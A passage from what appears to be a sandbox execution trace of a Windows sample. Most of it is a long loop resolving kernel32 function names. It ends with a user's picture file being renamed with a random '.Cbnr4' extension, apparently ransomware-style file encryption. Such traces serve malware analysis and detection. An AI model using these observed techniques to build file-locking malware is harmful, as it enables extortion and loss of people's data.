lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.765] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.765] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.765] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.765] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.765] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.765] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.765] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.765] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.765] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.765] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.765] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.765] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.765] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.765] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.765] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.765] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.765] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.765] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.766] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.766] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.766] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.766] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.766] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.766] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.766] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.766] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.766] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.766] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.766] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.766] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.766] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.766] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.766] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.766] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.766] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.766] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.766] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.766] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.767] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.767] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.767] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.767] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.767] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.767] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.767] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.767] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.767] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.767] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.767] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.767] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.767] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.767] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.767] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.767] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.767] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.767] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.767] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.768] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.768] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.768] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.768] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.768] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.768] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.768] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.768] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.768] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.768] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.768] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.768] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.768] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.768] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.768] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.768] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.768] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.768] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.768] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.769] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.769] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.769] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.769] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.769] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.769] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.769] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.769] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.769] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.769] lstrlenA (lpString="DELETEATOM") returned 10 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.769] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.769] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.769] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.769] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.769] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.769] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.769] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.769] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.769] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.770] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.770] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.770] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.770] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.770] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.770] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.770] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.770] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.770] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.770] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.770] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.770] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.770] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.770] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.770] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.770] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.770] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.770] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.770] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.771] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.771] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.771] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.771] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.771] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.771] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.771] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.771] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.771] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.771] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.771] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.771] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.771] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.771] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.771] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.771] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.771] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.771] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.771] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.771] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.771] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.771] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.771] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.771] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.771] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.771] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.771] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.771] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.771] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.772] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\L48TW.bmp") returned 60 [0086.772] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\L48TW.bmp.Cbnr4") returned 66 [0086.772] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\L48TW.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\l48tw.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 